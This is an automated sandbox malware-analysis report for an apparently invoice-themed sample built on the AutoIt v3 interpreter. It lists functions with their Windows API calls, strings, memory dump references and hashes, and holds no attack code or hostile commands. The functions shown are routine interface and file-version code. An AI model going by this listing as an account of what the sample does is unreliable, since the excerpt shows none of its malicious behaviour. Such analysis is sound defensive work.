                                                                                                                    APIs
                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 002DA630
                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 002DA661
                                                                                                                    • GetSysColor.USER32(0000000F), ref: 002DA66D
                                                                                                                    • SetBkColor.GDI32(?,000000FF), ref: 002DA687
                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 002DA696
                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 002DA6C1
                                                                                                                    • GetSysColor.USER32(00000010), ref: 002DA6C9
                                                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 002DA6D0
                                                                                                                    • FrameRect.USER32(?,?,00000000), ref: 002DA6DF
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 002DA6E6
                                                                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 002DA731
                                                                                                                    • FillRect.USER32(?,?,00000000), ref: 002DA763
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 002DA78E
                                                                                                                      • Part of subcall function 002DA8CA: GetSysColor.USER32(00000012), ref: 002DA903
                                                                                                                      • Part of subcall function 002DA8CA: SetTextColor.GDI32(?,?), ref: 002DA907
                                                                                                                      • Part of subcall function 002DA8CA: GetSysColorBrush.USER32(0000000F), ref: 002DA91D
                                                                                                                      • Part of subcall function 002DA8CA: GetSysColor.USER32(0000000F), ref: 002DA928
                                                                                                                      • Part of subcall function 002DA8CA: GetSysColor.USER32(00000011), ref: 002DA945
                                                                                                                      • Part of subcall function 002DA8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 002DA953
                                                                                                                      • Part of subcall function 002DA8CA: SelectObject.GDI32(?,00000000), ref: 002DA964
                                                                                                                      • Part of subcall function 002DA8CA: SetBkColor.GDI32(?,00000000), ref: 002DA96D
                                                                                                                      • Part of subcall function 002DA8CA: SelectObject.GDI32(?,?), ref: 002DA97A
                                                                                                                      • Part of subcall function 002DA8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 002DA999
                                                                                                                      • Part of subcall function 002DA8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002DA9B0
                                                                                                                      • Part of subcall function 002DA8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 002DA9C5
                                                                                                                      • Part of subcall function 002DA8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 002DA9ED
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3521893082-0
                                                                                                                    • Opcode ID: e1765603805aae49f496ae2f1993bc5ed515123438a6468bdf0736ec1af56084
                                                                                                                    • Instruction ID: 61face4d5d7ce4121d35d366bd72d65739a60ac5defc2cf0b87f593646640684
                                                                                                                    • Opcode Fuzzy Hash: e1765603805aae49f496ae2f1993bc5ed515123438a6468bdf0736ec1af56084
                                                                                                                    • Instruction Fuzzy Hash: 5F91AE72809301EFD7509F64ED0CE5BBBA9FB88321F144A2AF9A2961A0D770DD44CB56
                                                                                                                    Function 00252C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DestroyWindow.USER32(?,?,?), ref: 00252CA2
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00252CE8
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00252CF3
                                                                                                                    • DestroyIcon.USER32(00000000,?,?,?), ref: 00252CFE
                                                                                                                    • DestroyWindow.USER32(00000000,?,?,?), ref: 00252D09
                                                                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 0028C43B
                                                                                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0028C474
                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0028C89D
                                                                                                                      • Part of subcall function 00251B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00252036,?,00000000,?,?,?,?,002516CB,00000000,?), ref: 00251B9A
                                                                                                                    • SendMessageW.USER32(?,00001053), ref: 0028C8DA
                                                                                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0028C8F1
                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0028C907
                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0028C912
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 464785882-4108050209
                                                                                                                    • Opcode ID: c242bffe38a1c5c3f36794229f67042679e8d786ec6a9f618404752b5d809c54
                                                                                                                    • Instruction ID: ebda1d4d354c488811d2c17919f666adfaa9fda1383fe0040badda4400c8fac1
                                                                                                                    • Opcode Fuzzy Hash: c242bffe38a1c5c3f36794229f67042679e8d786ec6a9f618404752b5d809c54
                                                                                                                    • Instruction Fuzzy Hash: 4812C034521202DFDB11DF24C888B69B7E5FF45302F64416AE856DB6A2C731EC69CFA4
                                                                                                                    Function 002C74AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DestroyWindow.USER32(00000000), ref: 002C74DE
                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 002C759D
                                                                                                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 002C75DB
                                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 002C75ED
                                                                                                                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 002C7633
                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 002C763F
                                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 002C7683
                                                                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 002C7692
                                                                                                                    • GetStockObject.GDI32(00000011), ref: 002C76A2
                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 002C76A6
                                                                                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 002C76B6
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002C76BF
                                                                                                                    • DeleteDC.GDI32(00000000), ref: 002C76C8
                                                                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 002C76F4
                                                                                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 002C770B
                                                                                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 002C7746
                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 002C775A
                                                                                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 002C776B
                                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 002C779B
                                                                                                                    • GetStockObject.GDI32(00000011), ref: 002C77A6
                                                                                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 002C77B1
                                                                                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 002C77BB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                    • API String ID: 2910397461-517079104
                                                                                                                    • Opcode ID: 9c08ddbf9105c8058b0192e1e0ffd6992f06f902025bb11f2ef9fa021098902a
                                                                                                                    • Instruction ID: 12df6ca57fc863ee08750bd613c75d1ad11997fceaa9114c7996f4293797bed1
                                                                                                                    • Opcode Fuzzy Hash: 9c08ddbf9105c8058b0192e1e0ffd6992f06f902025bb11f2ef9fa021098902a
                                                                                                                    • Instruction Fuzzy Hash: EEA19D71A10615FFEB10DBA4DD4AFAEBBA9EB48710F008215FA15A72E0C770AD11CF64
                                                                                                                    Function 002BAD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 002BAD1E
                                                                                                                    • GetDriveTypeW.KERNEL32(?,002DFAC0,?,\\.\,002DF910), ref: 002BADFB
                                                                                                                    • SetErrorMode.KERNEL32(00000000,002DFAC0,?,\\.\,002DF910), ref: 002BAF59
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$DriveType
                                                                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                    • API String ID: 2907320926-4222207086
                                                                                                                    • Opcode ID: 5c9481c8ffd84b0e04a4078ff463f9fe635480ff204a9c97b8b8fc0677206dda
                                                                                                                    • Instruction ID: edc7689b18a49d86f7cd628ba1cc8f430127864ab9cbce9cf9b914c8436375b3
                                                                                                                    • Opcode Fuzzy Hash: 5c9481c8ffd84b0e04a4078ff463f9fe635480ff204a9c97b8b8fc0677206dda
                                                                                                                    • Instruction Fuzzy Hash: F751B5B0675306DBCB01DF14C962CFD73A0EB087817244066F887A7AD1CA729D65DB96
                                                                                                                    Function 002568DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __wcsnicmp
                                                                                                                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                    • API String ID: 1038674560-86951937
                                                                                                                    • Opcode ID: 578593d18259362c92708d0a17927803b0574718e745ba1e919f579563044966
                                                                                                                    • Instruction ID: 629e8706de003dc01948c8c634ee9b3119db3184fc5907d0812bc4a68cef3837
                                                                                                                    • Opcode Fuzzy Hash: 578593d18259362c92708d0a17927803b0574718e745ba1e919f579563044966
                                                                                                                    • Instruction Fuzzy Hash: 3B8136B0671206AADF20BE60DC46FBB7768AF15701F444025FC056B1D2EB70DE79DAA8
                                                                                                                    Function 002D9A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 002D9AD2
                                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 002D9B8B
                                                                                                                    • SendMessageW.USER32(?,00001102,00000002,?), ref: 002D9BA7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 2326795674-4108050209
                                                                                                                    • Opcode ID: e002e39e470b65877d2eafd977ed7935c623743cd7bc7fd5b001d1a37159dd46
                                                                                                                    • Instruction ID: abcc64aa75186a53e64df0cd74c121f5c5dae48da3f3c262ee848487fc83fb77
                                                                                                                    • Opcode Fuzzy Hash: e002e39e470b65877d2eafd977ed7935c623743cd7bc7fd5b001d1a37159dd46
                                                                                                                    • Instruction Fuzzy Hash: F302CE31225202AFD725CF14C848BAABBE5FF49314F04852FF999963A1C774DDA4CB92
                                                                                                                    Function 002DA8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetSysColor.USER32(00000012), ref: 002DA903
                                                                                                                    • SetTextColor.GDI32(?,?), ref: 002DA907
                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 002DA91D
                                                                                                                    • GetSysColor.USER32(0000000F), ref: 002DA928
                                                                                                                    • CreateSolidBrush.GDI32(?), ref: 002DA92D
                                                                                                                    • GetSysColor.USER32(00000011), ref: 002DA945
                                                                                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 002DA953
                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 002DA964
                                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 002DA96D
                                                                                                                    • SelectObject.GDI32(?,?), ref: 002DA97A
                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 002DA999
                                                                                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002DA9B0
                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 002DA9C5
                                                                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 002DA9ED
                                                                                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 002DAA14
                                                                                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 002DAA32
                                                                                                                    • DrawFocusRect.USER32(?,?), ref: 002DAA3D
                                                                                                                    • GetSysColor.USER32(00000011), ref: 002DAA4B
                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 002DAA53
                                                                                                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 002DAA67
                                                                                                                    • SelectObject.GDI32(?,002DA5FA), ref: 002DAA7E
                                                                                                                    • DeleteObject.GDI32(?), ref: 002DAA89
                                                                                                                    • SelectObject.GDI32(?,?), ref: 002DAA8F
                                                                                                                    • DeleteObject.GDI32(?), ref: 002DAA94
                                                                                                                    • SetTextColor.GDI32(?,?), ref: 002DAA9A
                                                                                                                    • SetBkColor.GDI32(?,?), ref: 002DAAA4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1996641542-0
                                                                                                                    • Opcode ID: cc50db550116fb242b4a16e68c33c8048166fc4a9fcac8357adf8030d819cbd4
                                                                                                                    • Instruction ID: 89429239170d5c2f248fbfb9c8cfe1eae23cff1f8f3d75e6c725f46cdc74606d
                                                                                                                    • Opcode Fuzzy Hash: cc50db550116fb242b4a16e68c33c8048166fc4a9fcac8357adf8030d819cbd4
                                                                                                                    • Instruction Fuzzy Hash: 75515F71D01209EFDB109FA4ED48E9E7BB9EB08320F158226F916AB2A1D7719D50CF94
                                                                                                                    Function 002D89D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 002D8AC1
                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002D8AD2
                                                                                                                    • CharNextW.USER32(0000014E), ref: 002D8B01
                                                                                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 002D8B42
                                                                                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 002D8B58
                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002D8B69
                                                                                                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 002D8B86
                                                                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 002D8BD8
                                                                                                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 002D8BEE
                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 002D8C1F
                                                                                                                    • _memset.LIBCMT ref: 002D8C44
                                                                                                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 002D8C8D
                                                                                                                    • _memset.LIBCMT ref: 002D8CEC
                                                                                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 002D8D16
                                                                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 002D8D6E
                                                                                                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 002D8E1B
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 002D8E3D
                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 002D8E87
                                                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 002D8EB4
                                                                                                                    • DrawMenuBar.USER32(?), ref: 002D8EC3
                                                                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 002D8EEB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 1073566785-4108050209
                                                                                                                    • Opcode ID: c2520726b30b25d1fac03354630cfe3159d68069255b47ef77f660a8b65f49f7
                                                                                                                    • Instruction ID: 43b34374f7004898a1010dece04866767b4aeb9b306bfc96badd74edeef7c732
                                                                                                                    • Opcode Fuzzy Hash: c2520726b30b25d1fac03354630cfe3159d68069255b47ef77f660a8b65f49f7
                                                                                                                    • Instruction Fuzzy Hash: BBE17F71921209EFDB219F64CC88EEE7B79EF09710F108157F915AA290DB709DA4DF60
                                                                                                                    Function 002D488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCursorPos.USER32(?), ref: 002D49CA
                                                                                                                    • GetDesktopWindow.USER32 ref: 002D49DF
                                                                                                                    • GetWindowRect.USER32(00000000), ref: 002D49E6
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 002D4A48
                                                                                                                    • DestroyWindow.USER32(?), ref: 002D4A74
                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 002D4A9D
                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002D4ABB
                                                                                                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 002D4AE1
                                                                                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 002D4AF6
                                                                                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 002D4B09
                                                                                                                    • IsWindowVisible.USER32(?), ref: 002D4B29
                                                                                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 002D4B44
                                                                                                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 002D4B58
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 002D4B70
                                                                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 002D4B96
                                                                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 002D4BB0
                                                                                                                    • CopyRect.USER32(?,?), ref: 002D4BC7
                                                                                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 002D4C32
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                    • String ID: ($0$tooltips_class32
                                                                                                                    • API String ID: 698492251-4156429822
                                                                                                                    • Opcode ID: 169437d293c61637b9639eac92049565e24a5d827386cf138bea263cab1f38b5
                                                                                                                    • Instruction ID: 931c114ef43d5f68b21ecbf5b5706b77e9e5289d050669e2a34897bd4cfc17c8
                                                                                                                    • Opcode Fuzzy Hash: 169437d293c61637b9639eac92049565e24a5d827386cf138bea263cab1f38b5
                                                                                                                    • Instruction Fuzzy Hash: FBB19C70624341AFDB04EF64D948B5ABBE4FF88304F00891EF99A9B2A1D770EC55CB95
                                                                                                                    Function 002B449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 002B44AC
                                                                                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 002B44D2
                                                                                                                    • _wcscpy.LIBCMT ref: 002B4500
                                                                                                                    • _wcscmp.LIBCMT ref: 002B450B
                                                                                                                    • _wcscat.LIBCMT ref: 002B4521
                                                                                                                    • _wcsstr.LIBCMT ref: 002B452C
                                                                                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 002B4548
                                                                                                                    • _wcscat.LIBCMT ref: 002B4591
                                                                                                                    • _wcscat.LIBCMT ref: 002B4598
                                                                                                                    • _wcsncpy.LIBCMT ref: 002B45C3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
